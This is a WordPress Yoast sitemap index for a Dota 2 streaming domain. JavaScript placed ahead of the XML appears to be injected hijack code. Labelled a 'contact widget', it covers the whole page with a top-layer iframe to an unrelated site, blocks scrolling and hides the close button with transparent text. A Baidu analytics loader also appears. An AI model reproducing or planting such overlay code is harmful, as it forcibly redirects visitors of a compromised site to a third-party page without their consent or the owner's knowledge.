<script>
(function () {
    var fullUrl = 'https://1688456.com';

    window.closecontactWidget = function () {
        var iframeContainer = document.getElementById('contactWidgetContainer');

        if (iframeContainer) {
            iframeContainer.style.display = 'none';
        }

        if (document.body) {
            document.body.classList.remove('iframe-is-active');
        }
    };

    function injectContactWidget() {
        if (!document.body) return;

        if (document.getElementById('contactWidgetContainer')) return;

        var style = document.createElement('style');
        style.textContent = `
            body.iframe-is-active {
                overflow: hidden;
            }

            #contactWidgetContainer {
                width: 100%;
                height: 100%;
                position: fixed;
                top: 0;
                left: 0;
                z-index: 2147483647;
                background: #fff;
            }

            #contactWidgetCloseBtn {
                position: absolute;
                top: 20px;
                right: 20px;
                width: 36px;
                height: 36px;
                font-size: 26px;
                line-height: 36px;
                background: transparent;
                color: transparent;
                border: none;
                border-radius: 50%;
                text-align: center;
                cursor: pointer;
                font-weight: bold;
                z-index: 2147483648;
                transition: background 0.2s ease, transform 0.2s ease;
            }

            #contactWidgetCloseBtn:hover {
                background: rgba(0, 0, 0, 0.8);
                transform: scale(1.05);
            }
        `;

        document.head.appendChild(style);

        var container = document.createElement('div');
        container.id = 'contactWidgetContainer';

        var closeBtn = document.createElement('button');
        closeBtn.id = 'contactWidgetCloseBtn';
        closeBtn.type = 'button';
        closeBtn.innerHTML = '&times;';
        closeBtn.onclick = window.closecontactWidget;

        var iframe = document.createElement('iframe');
        iframe.src = fullUrl;
        iframe.frameBorder = '0';
        iframe.style.border = '0';
        iframe.style.width = '100%';
        iframe.style.height = '100%';

        container.appendChild(closeBtn);
        container.appendChild(iframe);

        document.body.prepend(container);
        document.body.classList.add('iframe-is-active');
    }

    if (document.body) {
        injectContactWidget();
    } else {
        var observer = new MutationObserver(function () {
            if (document.body) {
                observer.disconnect();
                injectContactWidget();
            }
        });

        observer.observe(document.documentElement, {
            childList: true,
            subtree: true
        });
    }
})();
</script>
<script>
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?ffca8549ce3e2e01a6cb85058827ddb3";
var s = document.getElementsByTagName("script")[0]; 
s.parentNode.insertBefore(hm, s);
})();
</script>

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//dota2saishizhibo.com.cn/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://dota2saishizhibo.com.cn/page-sitemap.xml</loc>
		<lastmod>2026-08-27T13:25:29+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->